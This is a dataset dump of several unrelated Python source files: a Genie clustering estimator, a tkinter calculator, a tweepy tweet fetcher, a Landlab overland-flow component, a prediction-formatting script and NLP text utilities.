cur_state[\"metric_params\"] = cur_state[\"nn_params\"].get(\"metric_params\", None)\n if cur_state[\"metric_params\"] is None:\n cur_state[\"metric_params\"] = dict()\n\n cur_state[\"n_clusters\"] = int(self.n_clusters)\n if cur_state[\"n_clusters\"] <= 1:\n raise ValueError(\"n_clusters must be > 1\")\n\n cur_state[\"gini_threshold\"] = float(self.gini_threshold)\n if not (0.0 <= 
cur_state[\"gini_threshold\"] <= 1.0):\n raise ValueError(\"gini_threshold not in [0,1]\")\n\n cur_state[\"M\"] = int(self.M)\n if not 1 <= cur_state[\"M\"] <= n:\n raise ValueError(\"M must be in [1, n_samples]\")\n\n cur_state[\"postprocess\"] = self.postprocess\n if cur_state[\"postprocess\"] not in (\"boundary\", \"none\", \"all\"):\n raise ValueError('postprocess should be one of (\"boundary\", \"none\", \"all\")')\n\n cur_state[\"n_neighbors\"] = int(self.n_neighbors)\n if 0 <= cur_state[\"n_neighbors\"] < max(1, cur_state[\"M\"]-1):\n raise ValueError(\"n_neighbors should be >= M-1\")\n\n cur_state[\"exact\"] = bool(self.exact)\n cur_state[\"allow_cast_float32\"] = bool(self.allow_cast_float32)\n\n if cur_state[\"allow_cast_float32\"]:\n X = X.astype(np.float32, order=\"C\", copy=False) # faiss supports float32 only # warning if sparse!!\n # center X + scale (NOT: standardize!)\n X = (X-X.mean(axis=0))/X.std(axis=None, ddof=1) # we don't want this for sparse X\n\n nn_dist = None\n nn_ind = None\n spanning_tree = None\n if not cur_state[\"exact\"]:\n #raise NotImplementedError(\"approximate method not implemented yet\")\n\n actual_n_neighbors = cur_state[\"n_neighbors\"]\n if actual_n_neighbors < 0:\n actual_n_neighbors = min(32, int(math.ceil(math.sqrt(n))))\n actual_n_neighbors = max(actual_n_neighbors, cur_state[\"M\"]-1)\n actual_n_neighbors = min(n-1, actual_n_neighbors)\n\n # t0 = time.time()\n #nn = sklearn.neighbors.NearestNeighbors(n_neighbors=actual_n_neighbors, **cur_state[\"nn_params\"])\n #nn_dist, nn_ind = nn.fit(X).kneighbors()\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n\n # FAISS - `euclidean` and `cosine` only!\n\n\n\n\n nn = faiss.IndexFlatL2(X.shape[1])\n nn.add(X)\n nn_dist, nn_ind = nn.search(X, actual_n_neighbors+1)\n\n # @TODO:::::\n #nn_bad_where = np.where((nn_ind[:,0]!=np.arange(n)))[0]\n #print(nn_bad_where)\n #print(nn_ind[nn_bad_where,:5])\n #print(X[nn_bad_where,:])\n #assert nn_bad_where.shape[0] == 0\n\n nn_dist = nn_dist[:,1:].astype(X.dtype, order=\"C\")\n nn_ind = nn_ind[:,1:].astype(np.intp, order=\"C\")\n\n if cur_state[\"M\"] > 1:\n # d_core = nn_dist[:,cur_state[\"M\"]-2].astype(X.dtype, order=\"C\")\n raise NotImplementedError(\"approximate method not implemented yet\")\n\n # t0 = time.time()\n mst_dist, mst_ind = mst.mst_from_nn(nn_dist, nn_ind, stop_disconnected=True)\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n\n else: # cur_state[\"exact\"]\n if cur_state[\"M\"] == 1:\n # the original Genie algorithm\n\n # 1. Use Prim's algorithm to determine the MST\n # w.r.t. the distances computed on the fly\n\n # t0 = time.time()\n\n mst_dist, mst_ind = mst.mst_from_distance(X,\n metric=cur_state[\"metric\"],\n metric_params=cur_state[\"metric_params\"])\n # print(\"T=%.3f\" % (time.time()-t0), end=\"\\t\")\n else:\n # Genie+HDBSCAN\n\n # 1. Use sklearn to determine d_core distance\n nn = sklearn.neighbors.NearestNeighbors(\n n_neighbors=cur_state[\"M\"]-1, **cur_state[\"nn_params\"])\n nn_dist, nn_ind = nn.fit(X).kneighbors()\n d_core = nn_dist[:,cur_state[\"M\"]-2].astype(nn_dist.dtype, order=\"C\")\n\n # 2. Use Prim's algorithm to determine the MST\n # w.r.t. 
the distances computed on the fly\n mst_dist, mst_ind = mst.mst_from_distance(X,\n metric=cur_state[\"metric\"],\n metric_params=dict(**cur_state[\"metric_params\"],\n d_core=d_core)\n )\n\n # apply the Genie+ algorithm\n labels = internal.genie_from_mst(mst_dist, mst_ind,\n n_clusters=cur_state[\"n_clusters\"],\n gini_threshold=cur_state[\"gini_threshold\"],\n noise_leaves=(cur_state[\"M\"]>1))\n\n # postprocess labels, if requested to do so\n if cur_state[\"M\"] == 1 or cur_state[\"postprocess\"] == \"none\":\n pass\n elif cur_state[\"postprocess\"] == \"boundary\":\n labels = internal.merge_boundary_points(mst_dist, mst_ind, labels, nn_ind, cur_state[\"M\"])\n elif cur_state[\"postprocess\"] == \"all\":\n labels = internal.merge_leaves_with_nearest_clusters(mst_dist, mst_ind, labels)\n\n self.labels_ = labels\n\n # # save state\n # self.__last_state = cur_state\n\n # self.__last_X = X\n # self.__last_mst = mst\n # self.__last_nn_dist = nn_dist\n # self.__last_nn_ind = nn_ind\n\n\n\n return self\n\n\n # not needed - inherited from ClusterMixin\n def fit_predict(self, X, y=None, cache=False):\n \"\"\"Compute a k-partition and return the predicted labels,\n see fit().\n\n\n Parameters\n ----------\n\n X : ndarray\n see fit()\n y : None\n see fit()\n cache : bool\n see fit()\n\n\n\n Returns\n -------\n\n labels_ : ndarray, shape (n_samples,)\n Predicted labels, representing a partition of X.\n labels_[i] gives the cluster id of the i-th input point.\n negative labels_ correspond to noise points.\n \"\"\"\n self.fit(X)\n return self.labels_\n\n\n # not needed - inherited from BaseEstimator\n # def __repr__(self):\n # \"\"\"\n # Return repr(self).\n # \"\"\"\n # return \"Genie(%s)\" % (\n # \", \".join([\"%s=%r\"%(k,v) for (k,v) in self.get_params().items()])\n # )\n\n #\n # def get_params(self, deep=False):\n # \"\"\"\n # Get the parameters for this estimator.\n #\n # Parameters:\n # -----------\n #\n # deep: bool\n # Ignored\n #\n # Returns:\n # --------\n #\n # params: dict\n # \"\"\"\n # return dict(\n # n_clusters = self.__n_clusters,\n # gini_threshold = self.__gini_threshold,\n # M = self.__M,\n # postprocess = self.__postprocess,\n # n_neighbors = self.__n_neighbors,\n # **self.__NearestNeighbors_params\n # )\n\n # not needed - inherited from BaseEstimator\n # def set_params(self, **params):\n # \"\"\"\n # Set the parameters for this estimator.\n #\n #\n # Parameters:\n # -----------\n #\n # params\n #\n #\n # Returns:\n # --------\n #\n # self\n # \"\"\"\n # ################## @TODO\n # return self\n","sub_path":"genieclust/genie.py","file_name":"genie.py","file_ext":"py","file_size_in_byte":15065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165771119","text":"from tkinter import *\nclass calculator:\n def __init__(self):\n self.error=False\n window = Tk()\n #window.geometry(\"266*208\")\n window.configure(background='white')\n window.title(\"Calculator\")\n\n self.string = StringVar()\n entry = Entry(window, textVariable = self.string)\n entry.grid(row = 0, column = 0, columnnspan = 6)\n entry.focus()\n\n values = [\"7\", \"8\", \"9\", \"/\", \"Clear\", \"<-\", \"4\", \"5\", \"6\", \"*\", \"(\", \")\", \"1\", \"2\", \"3\", \"-\", \"=\", \"0\", \".\", \"%\", \"+\"]\n i=0\n row=1\n col=0\n for txt in values:\n padx=10;\n pady=10;\n if(i==6):\n row=2\n col=0\n if(i==12):\n row=3\n col=0\n if(i==17):\n row=4\n col=0\n if(txt==\"=\"):\n btn = Button(window, height = 2, width = 4, padx=23, pady=23, text=txt)\n btn.grid(row=row, 
column=col, columnspan=2, rowspan=2, padx=1, pady=1)\n elif(txt==\"Clear\"):\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n elif(txt=='<-'):\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n else:\n btn = Button(window, height=2, width=4, padx=padx, pady=pady, text=txt)\n btn.grid(row=row, column=col, padx=1, pady=1)\n col+=1;\n i+=1;\n window.mainloop()\ncalculator()\n","sub_path":"Calculator-IDLE.py","file_name":"Calculator-IDLE.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"641013428","text":"import tweepy\r\nfrom typing import List\r\nfrom datetime import datetime, timedelta\r\nfrom secrets import CONS_KEY, CONS_SECRET, ACC_SECRET, ACC_TOKEN\r\n\r\n# Function to authenticate to the Twitter API\r\ndef authentication(cons_key, cons_secret, acc_token, acc_secret):\r\n auth = tweepy.OAuthHandler(cons_key, cons_secret)\r\n auth.set_access_token(acc_token, acc_secret)\r\n api = tweepy.API(auth)\r\n return api\r\n\r\n\r\n# Function to get the last 10 tweets for a specific keyword\r\ndef get_tweets_by_keyword(keyword: str) -> List[str]:\r\n all_tweets = []\r\n api = authentication(CONS_KEY, CONS_SECRET, ACC_TOKEN, ACC_SECRET)\r\n yesterday_datetime = datetime.today().now() - timedelta(days=1)\r\n yesterday_date = yesterday_datetime.strftime(\"%Y-%m-%d\")\r\n try:\r\n for tweet in tweepy.Cursor(\r\n api.search,\r\n q=keyword,\r\n tweet_mode=\"extended\",\r\n since=yesterday_date,\r\n result_type=\"recent\",\r\n lang=\"it\",\r\n ).items(10):\r\n all_tweets.append(tweet.full_text)\r\n except Exception:\r\n print(\"Topic not found\")\r\n return all_tweets\r\n\r\n\r\n# Function to get the last 10 tweets by a specific user\r\ndef get_tweets_by_user(screen_name: str) -> List[str]:\r\n all_tweets = []\r\n api = authentication(CONS_KEY, CONS_SECRET, ACC_TOKEN, ACC_SECRET)\r\n screen_name = \"@\" + screen_name\r\n try:\r\n for tweet in tweepy.Cursor(\r\n api.user_timeline, screen_name=screen_name, tweet_mode=\"extended\"\r\n ).items(10):\r\n all_tweets.append(tweet.full_text)\r\n except Exception:\r\n print(\"User not found\")\r\n return all_tweets\r\n\r\n\r\n# def clean_tweets(all_tweets: List[str]) -> List[str]:\r\n# tweets_clean = []\r\n# for tweet in all_tweets:\r\n# #remove usernames\r\n# user_removed = re.sub(r'@[A-Za-z0-9]+','',tweet)\r\n# #remove links\r\n# link_removed = re.sub('https?://[A-Za-z0-9./]+','',user_removed)\r\n# #remove numbers\r\n# number_removed = re.sub('[^a-zA-Z]', ' ', link_removed)\r\n# #make the tweet lowercase\r\n# lower_case_tweet= number_removed.lower()\r\n# #remove unnecessary spaces\r\n# tok = WordPunctTokenizer()\r\n# words = tok.tokenize(lower_case_tweet)\r\n# clean_tweet = (' '.join(words)).strip()\r\n# print(\"Clean tweet \")\r\n# print(clean_tweet)\r\n# print(\"\\n\")\r\n# print(\"Original tweet \")\r\n# print(tweet)\r\n# tweets_clean.append(clean_tweet)\r\n# return tweets_clean\r\n\r\n# def get_sentiment(all_tweets: List[str]) -> List[float]:\r\n# sentiment_scores = []\r\n# for tweet in all_tweets:\r\n# blob = TextBlob(tweet)\r\n# sentiment_scores.append(blob.sentiment.polarity)\r\n# return sentiment_scores\r\n\r\n# def generate_average_sentiment_score(keyword: str) -> int:\r\n# tweets = get_tweets(keyword)\r\n# tweets_clean =clean_tweets(tweets)\r\n# sentiment_scores = get_sentiment(tweets_clean)\r\n# 
average_score = statistics.mean(sentiment_scores)\r\n# return average_score\r\n\r\n# if __name__ == \"__main__\":\r\n# print(\"What does the world prefer?\")\r\n# first_input = input()\r\n# print('...or...')\r\n# second_input = input()\r\n# print(\"\\n\")\r\n\r\n# first_score = generate_average_sentiment_score(first_input)\r\n# second_score = generate_average_sentiment_score(second_input)\r\n\r\n# print(f\"The first score is {first_score} and the second score is {second_score}\")\r\n# if(first_score > second_score):\r\n# print(f\"The humanity prefers {first_input} over {second_input}\")\r\n# elif(first_score < second_score):\r\n# print(f\"The humanity prefers {second_input} over {first_input}\")\r\n# else:\r\n# print(\"The two are equal\")\r\n","sub_path":"tweets.py","file_name":"tweets.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574645359","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLandlab component for overland flow using a local implicit solution to the\nkinematic-wave approximation.\n\nCreated on Fri May 27 14:26:13 2016\n\n@author: gtucker\n\"\"\"\n\n\nfrom landlab import Component\nfrom landlab.components import FlowAccumulator\nfrom scipy.optimize import newton\nimport numpy as np\n\n\ndef water_fn(x, a, b, c, d, e):\n \"\"\"Evaluates the solution to the water-depth equation.\n\n Called by scipy.newton() to find solution for $x$ using Newton's method.\n\n Parameters\n ----------\n x : float\n Water depth at new time step.\n a : float\n \"alpha\" parameter (see below)\n b : float\n Weighting factor on new versus old time step. $b=1$ means purely\n implicit solution with all weight on $H$ at new time step. $b=0$ (not\n recommended) would mean purely explicit.\n c : float\n Water depth at old time step (time step $t$ instead of $t+1$)\n d : float\n Depth-discharge exponent; normally either 5/3 (Manning) or 3/2 (Chezy)\n e : float\n Water inflow volume per unit cell area in one time step.\n\n This equation represents the implicit solution for water depth $H$ at the\n next time step. In the code below, it is formulated in a generic way. \n Written using more familiar terminology, the equation is:\n\n $H - H_0 + \\alpha ( w H + (w-1) H_0)^d - \\Delta t (R + Q_{in} / A)$\n \n $\\alpha = \\frac{\\Delta t \\sum S^{1/2}}{C_f A}$\n \n where $H$ is water depth at the given node at the new time step, $H_0$ is\n water depth at the prior time step, $w$ is a weighting factor, $d$ is the\n depth-discharge exponent (2/3 or 1/2), $\\Delta t$ is time-step duration,\n $R$ is local runoff rate, $Q_{in}$ is inflow discharge, $A$ is cell area,\n $C_f$ is a dimensional roughness coefficient, and $\\sum S^{1/2}$ represents\n the sum of square-root-of-downhill-gradient over all outgoing (downhill)\n links.\n \"\"\"\n return x - c + a * (b * x + (b - 1.0) * c) ** d - e\n\n\nclass KinwaveImplicitOverlandFlow(Component):\n \"\"\"\n Calculate shallow water flow over topography.\n\n Landlab component that implements a two-dimensional kinematic wave model.\n This is a form of the 2D shallow-water equations in which energy slope is\n assumed to equal bed slope. The solution method is locally implicit, and\n works as follows. At each time step, we iterate from upstream to downstream\n over the topography. Because we are working downstream, we can assume that\n we know the total water inflow to a given cell. 
We solve the following mass \n conservation equation at each cell:\n \n $(H^{t+1} - H^t)/\\Delta t = Q_{in}/A - Q_{out}/A + R$\n \n where $H$ is water depth, $t$ indicates time step number, $\\Delta t$ is\n time step duration, $Q_{in}$ is total inflow discharge, $Q_{out}$ is total\n outflow discharge, $A$ is cell area, and $R$ is local runoff rate \n (precipitation minus infiltration; could be negative if runon infiltration\n is occurring).\n \n The specific outflow discharge leaving a cell along one of its faces is:\n \n $q = (1/C_r) H^\\alpha S^{1/2}$\n \n where $C_r$ is a roughness coefficient (such as Manning's n), $\\alpha$ is\n an exponent equal to 5/3 for the Manning equation and 3/2 for the Chezy\n family, and $S$ is the downhill-positive gradient of the link that crosses\n this particular face. Outflow discharge is zero for links that are flat or\n \"uphill\" from the given node. Total discharge out of a cell is then the\n sum of (specific discharge x face width) over all outflow faces\n \n $Q_{out} = \\sum_{i=1}^N (1/C_r) H^\\alpha S_i^{1/2} W_i$\n \n where $N$ is the number of outflow faces (i.e., faces where the ground\n slopes downhill away from the cell's node), and $W_i$ is the width of face\n $i$.\n \n We use the depth at the cell's node, so this simplifies to:\n\n $Q_{out} = (1/C_r) H'^\\alpha \\sum_{i=1}^N S_i^{1/2} W_i$\n \n We define $H$ in the above as a weighted sum of the \"old\" (time step $t$)\n and \"new\" (time step $t+1$) depth values:\n \n $H' = w H^{t+1} + (1-w) H^t$\n \n If $w=1$, the method is fully implicit. If $w=0$, it is a simple forward\n explicit method.\n \n When we combine these equations, we have an equation that includes the\n unknown $H^{t+1}$ and a bunch of terms that are known. If $w\\ne 0$, it is\n a nonlinear equation in $H^{t+1}$, and must be solved iteratively. 
We do\n this using a root-finding method in the scipy.optimize library.\n\n Construction:\n\n KinwaveImplicitOverlandFlow(grid, precip_rate=1.0,\n precip_duration=1.0,\n infilt_rate=0.0,\n roughness=0.01, **kwds)\n\n Parameters\n ----------\n grid : ModelGrid\n A Landlab grid object.\n precip_rate : float, optional (defaults to 1 mm/hr)\n Precipitation rate, mm/hr\n precip_duration : float, optional (defaults to 1 hour)\n Duration of precipitation, hours\n infilt_rate : float, optional (defaults to 0)\n Maximum rate of infiltration, mm/hr\n roughnes : float, defaults to 0.01\n Manning roughness coefficient, s/m^1/3\n\n Examples\n --------\n >>> from landlab import RasterModelGrid\n >>> rg = RasterModelGrid((4, 5), 10.0)\n >>> z = rg.add_zeros('node', 'topographic__elevation')\n >>> kw = KinwaveImplicitOverlandFlow(rg)\n >>> round(kw.runoff_rate * 1.0e7, 2)\n 2.78\n >>> kw.vel_coef # default value\n 100.0\n >>> rg.at_node['surface_water__depth'][6:9]\n array([ 0., 0., 0.])\n \"\"\"\n\n _name = 'KinwaveImplicitOverlandFlow'\n\n _input_var_names = (\n 'topographic__elevation',\n )\n\n _output_var_names = (\n 'topographic__gradient',\n 'surface_water__depth',\n #'water__velocity',\n #'water__specific_discharge',\n 'surface_water_inflow__discharge',\n )\n\n _var_units = {\n 'topographic__elevation': 'm',\n 'topographic__slope': 'm/m',\n 'surface_water__depth': 'm',\n 'water__velocity': 'm/s',\n 'water__specific_discharge': 'm2/s',\n }\n\n _var_mapping = {\n 'topographic__elevation': 'node',\n 'topographic__gradient': 'link',\n 'surface_water__depth': 'node',\n #'water__velocity': 'link',\n #'water__specific_discharge': 'link',\n 'surface_water_inflow__discharge' : 'node',\n }\n\n _var_doc = {\n 'topographic__elevation':\n 'elevation of the ground surface relative to some datum',\n 'topographic__gradient':\n 'gradient of the ground surface',\n 'surface_water__depth':\n 'depth of water',\n# 'water__velocity':\n# 'flow velocity component in the direction of the link',\n# 'water__specific_discharge':\n# 'flow discharge component in the direction of the link',\n 'surface_water_inflow__discharge':\n 'water volume inflow rate to the cell around each node'\n }\n\n def __init__(self, grid, runoff_rate=1.0, roughness=0.01,\n changing_topo=False, depth_exp=1.5, weight=1.0, **kwds):\n \"\"\"Initialize the KinwaveOverlandFlowModel.\n\n Parameters\n ----------\n grid : ModelGrid\n Landlab ModelGrid object\n runoff_rate : float, optional (defaults to 1 mm/hr)\n Precipitation rate, mm/hr\n roughnes : float, defaults to 0.01\n Manning roughness coefficient, s/m^1/3\n changing_topo : boolean, optional (defaults to False)\n Flag indicating whether topography changes between time steps\n depth_exp : float (defaults to 1.5)\n Exponent on water depth in velocity equation (3/2 for Darcy/Chezy,\n 5/3 for Manning)\n weight : float (defaults to 1.0)\n Weighting on depth at new time step versus old time step (1 = all\n implicit; 0 = explicit)\n \"\"\"\n\n # Store grid and parameters and do unit conversion\n self._grid = grid\n self.runoff_rate = runoff_rate / 3600000.0 # convert to m/s\n self.vel_coef = 1.0 / roughness # do division now to save time\n self.changing_topo = changing_topo\n self.depth_exp = depth_exp\n self.weight = weight\n\n # Get elevation field\n try:\n self.elev = grid.at_node['topographic__elevation']\n except:\n raise\n\n # Create fields...\n # Water depth\n if 'surface_water__depth' in grid.at_node:\n self.depth = grid.at_node['surface_water__depth']\n else:\n self.depth = grid.add_zeros('node', 
'surface_water__depth')\n # Slope\n if 'topographic__gradient' in grid.at_link:\n self.slope = grid.at_link['topographic__gradient']\n else:\n self.slope = grid.add_zeros('link', 'topographic__gradient')\n # Velocity\n# if 'water__velocity' in grid.at_link:\n# self.vel = grid.at_link['water__velocity']\n# else:\n# self.vel = grid.add_zeros('link', 'water__velocity')\n # Discharge\n# if 'surface_water__specific_discharge' in grid.at_link:\n# self.disch = grid.at_link['surface_water__specific_discharge']\n# else:\n# self.disch = grid.add_zeros('link',\n# 'surface_water__specific_discharge')\n # Inflow discharge at nodes\n if 'surface_water_inflow__discharge' in grid.at_node:\n self.disch_in = grid.at_node['surface_water_inflow__discharge']\n else:\n self.disch_in = grid.add_zeros('node',\n 'surface_water_inflow__discharge')\n\n # This array holds, for each node, the sum of sqrt(slope) x face width\n # for each link/face.\n self.grad_width_sum = grid.zeros('node')\n\n # This array holds the prefactor in the algebraic equation that we\n # will find a solution for.\n self.alpha = grid.zeros('node')\n\n # Instantiate flow router\n self.flow_accum = FlowAccumulator(grid, 'topographic__elevation',\n flow_director='MFD',\n partition_method='square_root_of_slope')\n\n # Flag to let us know whether this is our first iteration\n self.first_iteration = True\n\n def run_one_step(self, dt, current_time=0.0, runoff_rate=None, **kwds):\n \"\"\"Calculate water flow for a time period `dt`.\n \"\"\"\n # Handle runoff rate\n if runoff_rate is None:\n runoff_rate = self.runoff_rate\n\n # If it's our first iteration, or if the topography may be changing,\n # do flow routing and calculate square root of slopes at links \n if self.changing_topo or self.first_iteration:\n\n # Calculate the ground-surface slope\n self.slope[self.grid.active_links] = \\\n self._grid.calc_grad_at_link(self.elev)[self._grid.active_links]\n \n # Take square root of slope magnitude for use in velocity eqn\n self.sqrt_slope = np.sqrt(np.abs(self.slope))\n\n # Re-route flow, which gives us the downstream-to-upstream\n # ordering\n self.flow_accum.run_one_step()\n self.nodes_ordered = self.grid.at_node['flow__upstream_node_order']\n self.flow_lnks = self.grid.at_node['flow__links_to_receiver_nodes']\n\n # (Re)calculate, for each node, sum of sqrt(gradient) x width\n self.grad_width_sum[:] = 0.0\n for i in range(self.flow_lnks.shape[1]):\n self.grad_width_sum[:] += (self.sqrt_slope[self.flow_lnks[:,i]]\n * self._grid.width_of_face[\n self.grid.face_at_link[self.flow_lnks[:,i]]])\n\n # Calculate values of alpha, which is defined as\n #\n # $\\alpha = \\frac{\\Sigma W S^{1/2} \\Delta t}{A C_r}$\n cores = self.grid.core_nodes\n self.alpha[cores] = (\n self.vel_coef * self.grad_width_sum[cores] * dt \n / (self.grid.area_of_cell[self.grid.cell_at_node[cores]]))\n\n # Zero out inflow discharge\n self.disch_in[:] = 0.0\n\n # Upstream-to-downstream loop\n for i in range(len(self.nodes_ordered) - 1, -1, -1):\n n = self.nodes_ordered[i]\n if self.grid.status_at_node[n] == 0:\n\n # Solve for new water depth\n aa = self.alpha[n]\n cc = self.depth[n]\n ee = ((dt * runoff_rate) \n + (dt * self.disch_in[n] \n / self.grid.area_of_cell[self.grid.cell_at_node[n]]))\n self.depth[n] = newton(water_fn, self.depth[n], \n args=(aa, self.weight, cc, \n self.depth_exp, ee))\n\n # Calc outflow\n Heff = (self.weight * self.depth[n]\n + (1.0 - self.weight) * cc)\n outflow = (self.vel_coef * (Heff ** self.depth_exp)\n * self.grad_width_sum[n]) # this is 
manning/chezy/darcy\n\n # Send flow downstream. Here we take total inflow discharge\n # and partition it among the node's neighbors. For this, we use\n # the flow director's \"proportions\" array, which contains, for\n # each node, the proportion of flow that heads out toward each\n # of its N neighbors. The proportion is zero if the neighbor is\n # uphill; otherwise, it is S^1/2 / sum(S^1/2). If for example\n # we have a raster grid, there will be four neighbors and four\n # proportions, some of which may be zero and some between 0 and\n # 1.\n self.disch_in[self.grid.neighbors_at_node[n]] += (outflow\n * self.flow_accum.flow_director.proportions[n])\n\n # TODO: the above is enough to implement the solution for flow\n # depth, but it does not provide any information about flow\n # velocity or discharge on links. This could be added as an\n # optional method, perhaps done just before output.\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"landlab/components/overland_flow/generate_overland_flow_implicit_kinwave.py","file_name":"generate_overland_flow_implicit_kinwave.py","file_ext":"py","file_size_in_byte":14450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"219297220","text":"#formats predictions in a way that can be uploaded to evaluation server \nfrom os import listdir\nfrom os.path import isfile, join\nimport sys\nfrom statistics import mode \nfrom Params import * \n\n#predictions=open('ensemble.csv','r').read().split('\\n') \npredictions=open(sys.argv[1],'r').read().split('\\n') \nwhile '' in predictions: \n predictions.remove('') \n\nwnids=open(labels,'r').read().split('\\n') \nwhile '' in wnids: \n wnids.remove('') \n\n\n\n#training data \nfile_names=[]\n#labels=[] \n\nlabel_dict=dict()\nlabels=open(labels,'r').read().split('\\n')\nwhile '' in labels:\n labels.remove('')\nfor i in range(len(labels)):\n label_dict[labels[i]]=i\n\nfor label in label_dict:\n #print str(label) \n cur_dir=training_dir+label+\"/images\" \n onlyfiles = [f for f in listdir(cur_dir) if isfile(join(cur_dir, f))]\n onlyfiles=[cur_dir+'/'+f for f in onlyfiles]\n file_names=file_names+onlyfiles\n #print str(len(file_names)) \n #cur_labels=nsamples*[label_dict[label]]\n #labels=labels+cur_labels\n #print str(len(labels))\nonlyfiles=file_names \n\n#cur_dir=test_dir+\"images/\"\n#onlyfiles = [f for f in listdir(cur_dir) if isfile(join(cur_dir, f))]\n\nentries=100000\n#outf=open('ensemble_formatted.tsv','w') \noutf=open(sys.argv[2],'w') \n#outf.write('Image\\tPretrained\\tPretrainedFreezeAndStack\\tVGG_Like\\tRegularizationAndDropout\\tEnsemble\\n')\nfor i in range(entries): \n image_name=onlyfiles[i] \n predict_indices=predictions[i].split('\\t') \n predict_indices=[int(i) for i in predict_indices] \n wnid1=wnids[predict_indices[0]]\n #wnid2=wnids[predict_indices[1]] \n #wnid3=wnids[predict_indices[2]] \n #wnid4=wnids[predict_indices[3]] \n #try: \n # vote=mode([wnid1,wnid2,wnid3,wnid4])\n #except: \n # vote=wnid4\n #if len(set(predict_indices))==1: \n # #all 3 agree!!! 
\n # print image_name+ '\\t'+str(vote) +'\\t' + str(predict_indices)\n outf.write(image_name+'\\t'+str(wnid1)+'\\n')#+'\\t'+str(wnid2)+'\\t'+str(wnid3)+'\\t'+str(wnid4)+'\\t'+str(vote)+'\\n')\n\n","sub_path":"format_predictions_for_server.py","file_name":"format_predictions_for_server.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556020317","text":"import unicodedata\nimport os\nimport re\nimport random\nimport numpy as np\nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nimport sys\n\n# Normalize text by mapping non-ascii characters to approximate ascii. e.g., beyonc'{e} becomes beyonce\ndef normalize_unicode(text):\n #return text.encode('ascii', 'ignore')\n return unicodedata.normalize('NFD', text).encode('ascii', 'ignore')\n\n# Standard word tokenizer.\n_treebank_word_tokenize = TreebankWordTokenizer().tokenize\n\ndef word_tokenize(text, language='english'):\n \"\"\"\n Return a tokenized copy of *text*,\n using NLTK's recommended word tokenizer\n (currently :class:`.TreebankWordTokenizer`\n along with :class:`.PunktSentenceTokenizer`\n for the specified language).\n\n :param text: text to split into sentences\n :param language: the model name in the Punkt corpus\n \"\"\"\n if sys.version_info[0] < 3:\n return [token for token in _treebank_word_tokenize(text)]\n else:\n return [token for token in _treebank_word_tokenize(text.decode(\"UTF-8\"))]\n\ndef get_ngrams(n, tokens, separator=\" \"):\n if n == 0:\n return [\" \".join(tokens)]\n\n # extract each n-token sequence from entire sequence of tokens\n ngrams = []\n for i, token in enumerate(tokens):\n # first k-gram at position k-1\n if i >= n - 1:\n ngrams.append(separator.join(tokens[i - n + 1:i + 1]))\n return ngrams\n\ndef get_vector(embedding, term):\n if term in embedding:\n return embedding[term]\n elif term.title() in embedding:\n return embedding[term.title()]\n elif term.lower() in embedding:\n return embedding[term.lower()]\n elif term.upper() in embedding:\n return embedding[term.upper()]\n return None\n\n\ndef get_word_vector(entity_model, word):\n if type(entity_model) == tuple:\n vocab, emb = entity_model\n wid = vocab[word]\n return emb[wid]\n else:\n return get_vector(entity_model, word)\n\ndef merge_two_dicts(x, y):\n \"\"\"Given two dicts, merge them into a new dict as a shallow copy.\"\"\"\n z = x.copy()\n z.update(y)\n return z\n\ndef invert_dict(dict):\n \"\"\"\n Convert a dict (string->int) into a list of strings (ie, dict value becomes list index)\n :param dict:\n :return:\n \"\"\"\n dict_inv = [\"\"] * (max(dict.values()) + 1)\n if sys.version_info[0] < 3:\n for word, index in dict.iteritems():\n dict_inv[index] = word\n else:\n for word, index in dict.items():\n dict_inv[index] = word\n return dict_inv\n\ndef clean_text(question):\n \"\"\"\n Prepare question text for tokenization: lowercase, remove punctuation, and remove episode numbers (these are added during Spark pipeline)\n e.g., \"Who plays in Seinfeld: The Contest S10E8?\" ==> \"who plays in seinfeld the contest\"\n :param question: string representing question (not tokenized)\n :return: string representing cleaned up question, ready for tokenization\n \"\"\"\n question = re.sub(\"[\\.\\t\\,\\:;\\(\\)\\?\\!]\", \" \", question.lower(), 0, 0)\n return re.sub(\"s\\d+e\\d+\", \"\", question, 0, 0)\n\ndef unsplit_query(query, qrepr, vocab_inv):\n \"\"\"\n Regenerate query from core elements, depending on the query representation.\n :param query: 
query as string\n :param qrepr: query representation (e.g., word or char).\n :param is_already_tokenized: use True if ``query'' was generated using vocab_inv (possibly using defeaturize),\n so we do not need to preprocess text\n :return:\n \"\"\"\n PAD_WORD_INDEX = 0\n if qrepr == \"word\":\n return \" \".join([vocab_inv[int(w)] for w in query if w != PAD_WORD_INDEX])\n elif qrepr == \"char\":\n return \"\".join([vocab_inv[int(w)] for w in query if w != PAD_WORD_INDEX])\n elif qrepr.endswith(\"gram\"):\n query_str = \"\"\n for w in query:\n if w != PAD_WORD_INDEX:\n if len(query_str) == 0:\n query_str = vocab_inv[int(w)]\n else:\n query_str += vocab_inv[int(w)][-1]\n return query_str[1:-1] # remove # mark in the beginning and end position.\n else:\n raise Exception(\"Unrecognized representation %s!\" % qrepr)\n\n\ndef split_sent(sent, qrepr, ngram_size=3):\n \"\"\"\n Split sentence into core elements, depending on the query representation.\n :param sent: sent as string\n :param qrepr: query representation (e.g., word or char).\n :param is_already_tokenized: use True if ``query'' was generated using vocab_inv (possibly using defeaturize),\n so we do not need to preprocess text\n :return:\n \"\"\"\n if qrepr == \"word\":\n return word_tokenize(sent)\n elif qrepr == \"char\":\n cs = list(sent)\n return [c for i, c in enumerate(cs) if i == 0 or c != \" \" or cs[i - 1] != \" 